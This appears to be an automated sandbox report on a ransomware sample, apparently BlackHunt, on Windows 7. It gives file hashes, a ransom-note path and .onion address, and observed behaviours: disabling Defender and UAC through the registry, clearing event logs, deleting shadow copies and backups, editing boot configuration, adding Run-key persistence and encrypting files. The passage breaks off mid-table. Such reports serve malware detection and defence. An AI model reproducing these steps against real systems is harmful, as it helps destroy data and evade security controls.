Analysis
-
max time kernel
23s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 23:07
Static task
static1
Behavioral task
behavioral1
Sample
3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe
Resource
win10v2004-20231222-en
General
-
Target
3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe
-
Size
707KB
-
MD5
5a0a0ea1a14e9fced35ed042253b317f
-
SHA1
b7d6e78e607a9e9ed9d180a4a257c4b29f9bfe9b
-
SHA256
3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7
-
SHA512
0b1f7adbdfa087a597ffc76d76ace2f15ca7691c7c274a731d3c9b258fd9356a573a488b7d7e08bbac3a0c03188b93280ebf9c64b6a4b561be3fe8d5c94cd83a
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1F89vnh:6uaTmkZJ+naie5OTamgEoKxLWoJh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2232 fsutil.exe 3060 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3776 wevtutil.exe 3784 wevtutil.exe 3468 wevtutil.exe 2772 wevtutil.exe 2744 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2428 bcdedit.exe 2792 bcdedit.exe 384 bcdedit.exe 2624 bcdedit.exe -
Renames multiple (2916) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 908 wbadmin.exe 1884 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\O: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\G: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\K: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\B: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\R: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\T: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\H: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\J: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\A: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\Q: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\L: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\N: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\W: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\Z: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\X: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\P: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\M: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\U: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\I: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\S: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened (read-only) \??\V: 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\plugins\visualization\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\Java\jre7\lib\images\cursors\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_zh_CN.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port-au-Prince 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_SelectionSubpicture.png 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\203x8subpicture.png 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_pt_BR.properties 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker_1.1.200.v20131119-0908.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Reunion 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_es.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Davis 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mahe 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_splitter\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\plugins\meta_engine\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Damascus 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\#BlackHunt_ReadMe.hta 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Atikokan 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#BlackHunt_ReadMe.hta 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Monterrey 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-highlight.png 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tongatapu 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\bandwidth.png 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_zh_4.4.0.v20140623020002.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\7-Zip\Lang\tg.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6CDT 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\#BlackHunt_ReadMe.txt 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_output\#BlackHunt_Private.key 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_SelectionSubpicture.png 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\US_export_policy.jar 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2456 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2188 vssadmin.exe 2660 vssadmin.exe 1916 vssadmin.exe 2636 vssadmin.exe 2392 vssadmin.exe 1452 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2136 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3524 PING.EXE -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Token: SeRestorePrivilege 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Token: SeBackupPrivilege 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Token: SeTakeOwnershipPrivilege 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Token: SeAuditPrivilege 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Token: SeSecurityPrivilege 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Token: SeIncBasePriorityPrivilege 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe Token: SeBackupPrivilege 1560 vssvc.exe Token: SeRestorePrivilege 1560 vssvc.exe Token: SeAuditPrivilege 1560 vssvc.exe Token: SeBackupPrivilege 2804 wbengine.exe Token: SeRestorePrivilege 2804 wbengine.exe Token: SeSecurityPrivilege 2804 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1944 wrote to memory of 2008 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 154 PID 1944 wrote to memory of 2008 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 154 PID 1944 wrote to memory of 2008 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 154 PID 1944 wrote to memory of 2008 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 154 PID 1944 wrote to memory of 2728 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 152 PID 1944 wrote to memory of 2728 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 152 PID 1944 wrote to memory of 2728 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 152 PID 1944 wrote to memory of 2728 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 152 PID 1944 wrote to memory of 2776 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 150 PID 1944 wrote to memory of 2776 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 150 PID 1944 wrote to memory of 2776 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 150 PID 1944 wrote to memory of 2776 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 150 PID 2008 wrote to memory of 2716 2008 cmd.exe 149 PID 2008 wrote to memory of 2716 2008 cmd.exe 149 PID 2008 wrote to memory of 2716 2008 cmd.exe 149 PID 2728 wrote to memory of 2260 2728 cmd.exe 148 PID 2728 wrote to memory of 2260 2728 cmd.exe 148 PID 2728 wrote to memory of 2260 2728 cmd.exe 148 PID 1944 wrote to memory of 2636 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 147 PID 1944 wrote to memory of 2636 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 147 PID 1944 wrote to memory of 2636 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 147 PID 1944 wrote to memory of 2636 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 147 PID 1944 wrote to memory of 2536 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 144 PID 1944 wrote to memory of 2536 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 144 PID 1944 wrote to memory of 2536 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 144 PID 1944 wrote to memory of 2536 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 144 PID 1944 wrote to memory of 1628 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 30 PID 1944 wrote to memory of 1628 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 30 PID 1944 wrote to memory of 1628 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 30 PID 1944 wrote to memory of 1628 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 30 PID 1944 wrote to memory of 2844 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 143 PID 1944 wrote to memory of 2844 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 143 PID 1944 wrote to memory of 2844 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 143 PID 1944 wrote to memory of 2844 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 143 PID 2536 wrote to memory of 2552 2536 cmd.exe 141 PID 2536 wrote to memory of 2552 2536 cmd.exe 141 PID 2536 wrote to memory of 2552 2536 cmd.exe 141 PID 2776 wrote to memory of 1664 2776 cmd.exe 140 PID 2776 wrote to memory of 1664 2776 cmd.exe 140 PID 2776 wrote to memory of 1664 2776 cmd.exe 140 PID 1944 wrote to memory of 2696 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 139 PID 1944 wrote to memory of 2696 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 139 PID 1944 wrote to memory of 2696 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 139 PID 1944 wrote to memory of 2696 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 139 PID 2636 wrote to memory of 2572 2636 cmd.exe 137 PID 2636 wrote to memory of 2572 2636 cmd.exe 137 PID 2636 wrote to memory of 2572 2636 cmd.exe 137 PID 1944 wrote to memory of 664 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 135 PID 1944 wrote to memory of 664 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 135 PID 1944 wrote to memory of 664 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 135 PID 1944 wrote to memory of 664 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 135 PID 1944 wrote to memory of 2492 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 133 PID 1944 wrote to memory of 2492 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 133 PID 1944 wrote to memory of 2492 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 133 PID 1944 wrote to memory of 2492 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 133 PID 1944 wrote to memory of 2652 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 131 PID 1944 wrote to memory of 2652 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 131 PID 1944 wrote to memory of 2652 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 131 PID 1944 wrote to memory of 2652 1944 3ea098b8d75612f82aed4707ebaed7c7a91bef97a343f6f9f892f4d96d68c5c7.exe 131 PID 2844 wrote to memory of 2580 2844 cmd.exe 130 PID 2844 